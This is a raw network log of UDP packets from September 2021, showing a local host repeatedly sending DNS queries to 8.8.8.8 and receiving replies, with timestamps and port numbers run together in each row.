                                          Sep 27, 2021 20:25:54.112126112 CEST6092753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:54.125935078 CEST53609278.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:54.783556938 CEST5785453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:54.815829992 CEST53578548.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:54.853558064 CEST6202653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:54.853847027 CEST5945353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:54.867284060 CEST53620268.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:54.867326021 CEST53594538.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:55.726558924 CEST6246853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:55.739996910 CEST53624688.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:55.768619061 CEST5256353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:55.769207001 CEST5472153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:55.782393932 CEST53525638.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:55.782442093 CEST53547218.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:56.420384884 CEST6282653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:56.433779955 CEST53628268.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:56.438690901 CEST6204653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:56.451993942 CEST53620468.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:57.108278990 CEST5122353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:57.121294022 CEST53512238.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:57.128237963 CEST6390853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:57.141964912 CEST53639088.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:57.800359011 CEST4922653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:57.813699007 CEST53492268.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:57.865005016 CEST6021253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:57.878588915 CEST53602128.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:58.152657986 CEST5886753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:58.166367054 CEST53588678.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:58.576149940 CEST5086453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:58.589430094 CEST53508648.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:58.593990088 CEST6150453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:58.607362032 CEST53615048.8.8.8192.168.2.7
                                          Sep 27, 2021 20:25:59.628273964 CEST6023153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:25:59.640908003 CEST53602318.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:00.655344963 CEST5009553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:00.669476986 CEST53500958.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:00.679641008 CEST5965453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:00.693370104 CEST53596548.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:01.331425905 CEST5823353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:01.344700098 CEST53582338.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:01.350888968 CEST5682253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:01.365263939 CEST53568228.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:01.451324940 CEST6257253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:01.464349031 CEST53625728.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:02.038477898 CEST5717953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:02.052011013 CEST53571798.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:02.057113886 CEST5612453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:02.070492029 CEST53561248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:02.380009890 CEST6228753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:02.400717974 CEST53622878.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:02.814068079 CEST5464453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:02.827584028 CEST53546448.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:02.835577965 CEST5915953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:02.848720074 CEST53591598.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:03.338016987 CEST5792453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:03.362535954 CEST53579248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:03.541110992 CEST5171253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:03.554991007 CEST53517128.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:03.559693098 CEST5886553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:03.594930887 CEST53588658.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:04.171557903 CEST6433753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:04.184688091 CEST53643378.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:04.254506111 CEST5040753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:04.267692089 CEST53504078.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:04.272145033 CEST6107553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:04.285075903 CEST53610758.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:04.996567011 CEST5495253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:04.997884989 CEST5918653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:05.009361982 CEST53549528.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:05.011293888 CEST53591868.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:05.016618013 CEST5228053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:05.030112982 CEST53522808.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:05.756948948 CEST5179453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:05.771013975 CEST53517948.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:05.777050972 CEST5081553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:05.792582989 CEST53508158.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:05.816279888 CEST5849853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:05.829721928 CEST53584988.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:06.516752005 CEST5686253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:06.530939102 CEST53568628.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:06.538594961 CEST6180753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:06.563410044 CEST53618078.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:06.603488922 CEST5200953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:06.621680975 CEST53520098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:07.247575045 CEST5864853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:07.260509968 CEST53586488.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:07.265738010 CEST5933753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:07.277765036 CEST53593378.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:07.428716898 CEST5926953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:07.441679001 CEST53592698.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:08.013267040 CEST4980253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:08.027592897 CEST53498028.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:08.217582941 CEST5070653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:08.230581999 CEST53507068.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:08.672808886 CEST5515353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:08.688290119 CEST53551538.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:09.026392937 CEST5974453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:09.041362047 CEST53597448.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:09.368282080 CEST5998753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:09.381016970 CEST53599878.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:09.825573921 CEST6127253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:09.837686062 CEST53612728.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:10.044320107 CEST5435253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:10.057593107 CEST53543528.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:10.637665033 CEST6069653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:10.650757074 CEST53606968.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:10.661396027 CEST5913953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:10.674549103 CEST53591398.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:10.767505884 CEST5956553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:10.779675007 CEST53595658.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:11.422432899 CEST5639753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:11.434880018 CEST53563978.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:11.458966970 CEST5281853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:11.473371029 CEST53528188.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:12.158341885 CEST5423653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:12.172019005 CEST53542368.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:12.251948118 CEST5469853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:12.266151905 CEST53546988.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:12.859316111 CEST5846853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:12.873389006 CEST53584688.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:13.013920069 CEST5829053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:13.035274029 CEST53582908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:13.519613981 CEST5410253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:13.532562971 CEST53541028.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:13.808783054 CEST5582253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:13.821945906 CEST53558228.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:14.152801991 CEST6456253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:14.169934034 CEST53645628.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:14.615021944 CEST6155753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:14.628648996 CEST53615578.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:14.810760975 CEST5437553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:14.825664997 CEST53543758.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:15.408827066 CEST4982153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:15.422096014 CEST53498218.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:15.496860981 CEST5401253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:15.511173010 CEST53540128.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:16.127614021 CEST6368453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:16.141031981 CEST53636848.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:16.178937912 CEST6291253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:16.192023039 CEST53629128.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:16.935102940 CEST6080453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:16.948764086 CEST53608048.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:16.992950916 CEST6013953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:17.006040096 CEST53601398.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:18.310174942 CEST5914053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:18.324116945 CEST53591408.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:18.382625103 CEST5090553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:18.394996881 CEST53509058.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:19.987658978 CEST5338153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:20.000881910 CEST53533818.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:20.157454014 CEST5439053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:20.170842886 CEST53543908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:20.762372971 CEST6351453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:20.775252104 CEST53635148.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:20.921623945 CEST5057853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:20.935945034 CEST53505788.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:21.455358982 CEST6355453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:21.468765020 CEST53635548.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:21.696141958 CEST6387853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:21.708801985 CEST53638788.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:22.155143023 CEST5379253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:22.167949915 CEST53537928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:22.939822912 CEST6528053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:22.942075014 CEST5589053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:22.951903105 CEST53652808.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:22.955353975 CEST53558908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:23.621762991 CEST5708253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:23.635545015 CEST53570828.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:23.702198982 CEST6432853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:23.715049982 CEST53643288.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:24.263060093 CEST5440053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:24.492841005 CEST5251453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:24.508251905 CEST53525148.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:24.589466095 CEST53544008.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:25.363213062 CEST5310453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:25.375384092 CEST53531048.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:25.985630989 CEST5436753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:25.998867989 CEST53543678.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:26.155800104 CEST6420253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:26.173239946 CEST53642028.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:26.947745085 CEST6217153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:26.961611032 CEST53621718.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:27.231370926 CEST5067253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:27.560750008 CEST53506728.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:27.725392103 CEST6356553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:27.738198042 CEST53635658.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:28.490812063 CEST6212153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:28.503357887 CEST53621218.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:28.799000025 CEST5933053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:28.813460112 CEST53593308.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:29.333806992 CEST5137853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:29.346869946 CEST53513788.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:30.018964052 CEST5841853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:30.032093048 CEST53584188.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:30.103540897 CEST6321153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:30.117753983 CEST53632118.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:30.912945032 CEST5751553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:30.926594019 CEST53575158.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:31.319029093 CEST5638153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:31.333245039 CEST53563818.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:31.693260908 CEST5836753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:31.706501007 CEST53583678.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:32.481089115 CEST5609653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:32.493242025 CEST53560968.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:33.277252913 CEST6004453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:33.290030003 CEST53600448.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:34.087224007 CEST6177553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:34.101382017 CEST53617758.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:34.868655920 CEST5081353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:34.882970095 CEST53508138.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:35.848607063 CEST6517353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:35.861495018 CEST53651738.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:37.423644066 CEST5130753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:37.436501026 CEST53513078.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:39.222430944 CEST5124853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:39.235862017 CEST53512488.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:40.120208025 CEST5047653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:40.133714914 CEST53504768.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:40.930840015 CEST6316853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:40.944011927 CEST53631688.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:41.555258036 CEST6299353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:41.570907116 CEST53629938.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:41.785125017 CEST5645253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:41.798176050 CEST53564528.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:42.237282038 CEST5454753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:42.251548052 CEST53545478.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:42.786906004 CEST4988653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:42.800791979 CEST53498868.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:43.340435028 CEST5664753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:43.373544931 CEST53566478.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:43.404819012 CEST5884553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:43.418596983 CEST53588458.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:44.032531023 CEST5981553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:44.046094894 CEST53598158.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:44.535887957 CEST5984753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:44.549506903 CEST53598478.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:45.093343019 CEST5774953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:45.106821060 CEST53577498.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:45.583859921 CEST6455453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:45.599760056 CEST53645548.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:46.246933937 CEST6114353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:46.262052059 CEST53611438.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:46.358287096 CEST6084253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:46.371422052 CEST53608428.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:46.967297077 CEST5477953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:46.980691910 CEST53547798.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:47.157856941 CEST5979453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:47.175295115 CEST53597948.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:47.905637026 CEST5135753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:47.918658972 CEST53513578.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:47.923732996 CEST5120853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:47.936333895 CEST53512088.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:48.714202881 CEST5117453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:48.726948023 CEST53511748.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:49.501499891 CEST5994553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:49.514455080 CEST53599458.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:49.519068956 CEST6504153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:49.532454014 CEST53650418.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:50.268588066 CEST5730053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:50.284754992 CEST53573008.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:51.032918930 CEST5270253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:51.046055079 CEST53527028.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:51.799602032 CEST6229253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:51.814224958 CEST53622928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:52.568475008 CEST5745353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:52.581841946 CEST53574538.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:53.348994970 CEST5013153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:53.363605022 CEST53501318.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:54.144356012 CEST5245853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:55.192473888 CEST5245853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:55.205689907 CEST53524588.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:55.996365070 CEST5552753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:56.010369062 CEST53555278.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:56.759000063 CEST6346553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:56.772144079 CEST53634658.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:57.537885904 CEST6355853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:57.551357031 CEST53635588.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:58.304603100 CEST5319253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:58.317310095 CEST53531928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:59.087606907 CEST5936053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:59.100308895 CEST53593608.8.8.8192.168.2.7
                                          Sep 27, 2021 20:26:59.871004105 CEST6174253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:26:59.884588957 CEST53617428.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:00.683235884 CEST6520953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:00.696050882 CEST53652098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:01.461709023 CEST6372753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:01.475539923 CEST53637278.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:02.250102997 CEST5841053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:02.263926029 CEST53584108.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:03.026706934 CEST6469253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:03.041388988 CEST53646928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:03.821991920 CEST5670653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:03.835410118 CEST53567068.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:04.598339081 CEST5729253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:04.610857964 CEST53572928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:05.373821974 CEST5952353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:05.386045933 CEST53595238.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:06.131067991 CEST6389653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:06.145781994 CEST53638968.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:06.934273005 CEST6354253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:06.948333979 CEST53635428.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:07.699145079 CEST6366953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:07.711954117 CEST53636698.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:08.462414026 CEST6086953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:08.476635933 CEST53608698.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:09.264369011 CEST5533053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:09.280138016 CEST53553308.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:10.073828936 CEST6209553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:10.087430954 CEST53620958.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:10.844527960 CEST5142553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:10.857237101 CEST53514258.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:11.619561911 CEST5390853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:11.631730080 CEST53539088.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:12.415213108 CEST5969253192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:12.430803061 CEST53596928.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:13.213284969 CEST5926853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:13.226983070 CEST53592688.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:13.980892897 CEST5510953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:13.996356964 CEST53551098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:14.761775017 CEST5697353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:14.775722027 CEST53569738.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:15.560414076 CEST5732453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:15.573328972 CEST53573248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:16.340569019 CEST4970653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:16.355988026 CEST53497068.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:17.120476007 CEST4924353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:17.133666039 CEST53492438.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:17.918859959 CEST5842053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:17.933006048 CEST53584208.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:18.677347898 CEST6498753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:18.690586090 CEST53649878.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:19.852977037 CEST4926553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:19.865675926 CEST53492658.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:20.666625977 CEST6162453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:20.679677963 CEST53616248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:21.464464903 CEST5920353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:21.478529930 CEST53592038.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:21.545475960 CEST5221153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:21.573528051 CEST53522118.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:22.228491068 CEST6094353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:22.242212057 CEST53609438.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:22.981463909 CEST5202153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:23.015538931 CEST53520218.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:23.027650118 CEST5872953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:23.040184975 CEST53587298.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:23.797799110 CEST5885153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:23.810910940 CEST53588518.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:24.591423988 CEST6061653192.168.2.78.8.8.8
